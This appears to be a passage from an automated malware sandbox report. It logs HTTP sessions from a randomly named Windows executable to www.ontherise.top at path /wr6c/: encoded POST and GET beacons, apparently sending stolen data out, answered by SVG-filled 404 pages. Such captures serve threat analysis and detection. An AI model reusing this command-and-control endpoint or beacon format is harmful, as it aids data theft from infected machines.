Jan 10, 2025 21:48:05.478691101 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
Jan 10, 2025 21:48:05.478703022 CET	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
Jan 10, 2025 21:48:05.478708982 CET	1236	IN	Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37 Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
Jan 10, 2025 21:48:05.478715897 CET	672	IN	Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
Jan 10, 2025 21:48:05.478720903 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Jan 10, 2025 21:48:05.478727102 CET	1116	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
Jan 10, 2025 21:48:05.478733063 CET	1236	IN	Data Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
Jan 10, 2025 21:48:05.478739977 CET	224	IN	Data Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
Jan 10, 2025 21:48:05.483606100 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31 Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50028	162.0.213.94	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:07.446753979 CET	10841	OUT	POST /wr6c/ HTTP/1.1 Host: www.ontherise.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.ontherise.top Referer: http://www.ontherise.top/wr6c/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 35 36 77 47 6e 51 6f 49 67 36 63 2b 67 66 47 66 37 6f 78 78 74 6a 4d 5a 4c 6c 6c 49 6f 72 59 46 52 62 53 79 65 46 53 77 41 47 4f 72 79 66 43 4e 76 55 31 45 31 72 48 31 52 47 6f 79 75 55 73 65 53 67 7a 58 65 75 6a 61 68 4b 4d 54 30 55 65 70 31 66 5a 45 4e 46 67 57 44 42 6d 48 55 59 36 4f 76 4b 6c 65 52 33 70 74 4e 44 69 70 6f 47 33 52 48 7a 4a 2f 46 50 79 62 64 6a 30 78 31 4d 59 78 39 52 45 57 45 38 4b 57 57 2f 6a 57 37 57 62 35 54 51 30 75 73 79 58 45 34 69 38 6c 43 4b 52 48 61 2b 37 6e 57 50 31 6c 63 68 51 39 6b 56 63 30 65 64 73 53 46 41 66 7a 5a 51 45 76 65 62 38 76 47 64 58 74 31 49 65 65 6c 5a 4e 78 61 74 75 55 6b 42 49 6c 49 52 59 43 68 68 58 6f 66 4d 54 69 37 6c 50 36 4f 64 47 62 36 78 48 41 34 66 62 68 4b 6c 32 61 49 57 59 4a 4c 7a 71 37 77 68 49 4e 2f 31 6f 2b 63 30 70 47 63 70 4d 44 7a 59 2f 75 79 49 38 56 72 63 61 6c 58 70 34 67 68 53 61 51 6f 6a 48 76 62 66 70 2b 76 31 74 36 53 4b 2f 4e 43 59 53 59 64 31 6d 4c 4e 65 49 4c 73 69 65 [TRUNCATED] Data Ascii: blO4h0=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorYFRbSyeFSwAGOryfCNvU1E1rH1RGoyuUseSgzXeujahKMT0Uep1fZENFgWDBmHUY6OvKleR3ptNDipoG3RHzJ/FPybdj0x1MYx9REWE8KWW/jW7Wb5TQ0usyXE4i8lCKRHa+7nWP1lchQ9kVc0edsSFAfzZQEveb8vGdXt1IeelZNxatuUkBIlIRYChhXofMTi7lP6OdGb6xHA4fbhKl2aIWYJLzq7whIN/1o+c0pGcpMDzY/uyI8VrcalXp4ghSaQojHvbfp+v1t6SK/NCYSYd1mLNeILsieLkF7zCEGrLUotkbar7oAoGVTNpRR1KKpXmWx1oDbKhggF3IWh98O1r9XPO84d585qFOlAWh3ZlOkN0fHXdT5blZP1rJG5XqAy7ohsGicI3vOdPqjnaD5I+Oc2sZ+VDmhlkcM6uZBa9J2JIXJh4bdL8Jaa23wdY8jgEZlNIjtxzoTgrRWJXs3joi+lKj9qBJ9jEezuDXLrCsvyd+XEJ803mS6moRSKc5za1ZluRfrFeKWhfwM2zXQgf54bwS/h75qfFO4vBzGCzHXSSFTHEZjUmN376+6FmUp1XutqLDaGbDTDoa5QXOHMGlkcJuejiqJ47EkqqpdjJ9wC4hNEHzJQlimu3XCrBVvO3ve6S6A7mFmVzT4u4EsHmgiPWd2GUD3avSmbR108KbWhX34rXazgFktueLSD+VCpo4ND4Ab/NcXU97TIGCdwRdIR80k/k+0sl5Lvze+3sHxuzFmMQYBrWTETMuUEu5G2sVX4JeTxIX2qbRDhmYb3RjlqLpw4bR35l1k7TgIbb3KVFz0ynmUKmSz4ZIjyK9f5mIatqz2cwxAYWyFjgRM98cM3aYmoljwbKrjXNmuUOgn76se/E6ajE+KUqf1RnCON9EwfQ+t879r5U/8BAXOeHk0KpdeGpRJMPYeZ60mgR2yjLz0wbJaKwASxLmUFWeXe1 [TRUNCATED]
Jan 10, 2025 21:48:08.260127068 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:48:08 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 21:48:08.260143995 CET	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
Jan 10, 2025 21:48:08.260154963 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
Jan 10, 2025 21:48:08.260168076 CET	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
Jan 10, 2025 21:48:08.260176897 CET	448	IN	Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37 Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
Jan 10, 2025 21:48:08.260190010 CET	1236	IN	Data Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
Jan 10, 2025 21:48:08.260199070 CET	224	IN	Data Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39 Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 10, 2025 21:48:08.260309935 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Jan 10, 2025 21:48:08.260322094 CET	1236	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
Jan 10, 2025 21:48:08.260334015 CET	1236	IN	Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
Jan 10, 2025 21:48:08.266782999 CET	1236	IN	Data Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50029	162.0.213.94	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:09.983134985 CET	474	OUT	GET /wr6c/?Q4DT=n4tTOrYxhN7&blO4h0=P2ZEIELZ0UPa04kWkm8Oh6lziqPRzY9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLl88FB/CXa3uNADngpIC+4Qo6DpYBhb1F8NR4= HTTP/1.1 Host: www.ontherise.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Jan 10, 2025 21:48:10.571640968 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:48:10 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 21:48:10.571664095 CET	224	IN	Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-
Jan 10, 2025 21:48:10.571676016 CET	1236	IN	Data Raw: 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 Data Ascii: 2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -
Jan 10, 2025 21:48:10.571695089 CET	1236	IN	Data Raw: 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 Data Ascii: -linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.6811
Jan 10, 2025 21:48:10.571707964 CET	1236	IN	Data Raw: 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 Data Ascii: troke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.74965
Jan 10, 2025 21:48:10.571718931 CET	672	IN	Data Raw: 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b Data Ascii: ll:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,
Jan 10, 2025 21:48:10.571732044 CET	1236	IN	Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
Jan 10, 2025 21:48:10.571743011 CET	1236	IN	Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
Jan 10, 2025 21:48:10.571755886 CET	448	IN	Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
Jan 10, 2025 21:48:10.571969032 CET	1236	IN	Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
